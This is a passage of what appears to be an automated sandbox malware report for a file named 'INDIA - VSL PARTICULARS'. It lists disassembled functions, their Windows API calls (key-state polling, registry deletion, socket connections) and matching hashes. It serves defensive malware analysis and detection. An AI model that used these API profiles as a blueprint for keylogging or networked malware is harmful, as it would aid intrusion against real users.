                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                              Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 004563A6
                              • ScreenToClient.USER32(?,?), ref: 004563C3
                              • GetAsyncKeyState.USER32(?), ref: 00456400
                              • GetAsyncKeyState.USER32(?), ref: 00456410
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AsyncState$ClientCursorLongScreenWindow
                              • String ID:
                              • API String ID: 3539004672-0
                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                              Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID:
                              • API String ID: 327565842-0
                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                              Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                              Download Yara Rule
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String
                              • String ID:
                              • API String ID: 2832842796-0
                              • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                              • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                              Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Enum$CloseDeleteOpen
                              • String ID:
                              • API String ID: 2095303065-0
                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                              Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00436A24
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: RectWindow
                              • String ID:
                              • API String ID: 861336768-0
                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                              Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32 ref: 00449598
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                              • _wcslen.LIBCMT ref: 0044960D
                              • _wcslen.LIBCMT ref: 0044961A
                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 1856069659-0
                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                              Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 004478E2
                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                              • GetCursorPos.USER32(00000000), ref: 0044796A
                              • TrackPopupMenuEx.USER32(00A063D0,00000000,00000000,?,?,00000000), ref: 00447991
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CursorMenuPopupTrack$Proc
                              • String ID:
                              • API String ID: 1300944170-0
                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                              Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                              Download Yara Rule
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004479CC
                              • GetCursorPos.USER32(?), ref: 004479D7
                              • ScreenToClient.USER32(?,?), ref: 004479F3
                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Client$CursorFromPointProcRectScreenWindow
                              • String ID:
                              • API String ID: 1822080540-0
                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                              Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 659298297-0
                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                              Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                • Part of subcall function 00440D98: SendMessageW.USER32(00A01B18,000000F1,00000000,00000000), ref: 00440E6E
                                • Part of subcall function 00440D98: SendMessageW.USER32(00A01B18,000000F1,00000001,00000000), ref: 00440E9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$EnableMessageSend$LongShow
                              • String ID:
                              • API String ID: 142311417-0
                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                              Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                              Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                              Download Yara Rule
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00445879
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                              • _wcslen.LIBCMT ref: 004458FB
                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                              • String ID:
                              • API String ID: 3087257052-0
                              • Opcode ID: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                              • Opcode Fuzzy Hash: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                              Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                              • closesocket.WSOCK32(00000000), ref: 00465481
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 245547762-0
                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                              Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 004471D8
                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • SelectObject.GDI32(?,00000000), ref: 00447228
                              • BeginPath.GDI32(?), ref: 0044723D
                              • SelectObject.GDI32(?,00000000), ref: 00447266
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Object$Select$BeginCreateDeletePath
                              • String ID:
                              • API String ID: 2338827641-0
                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
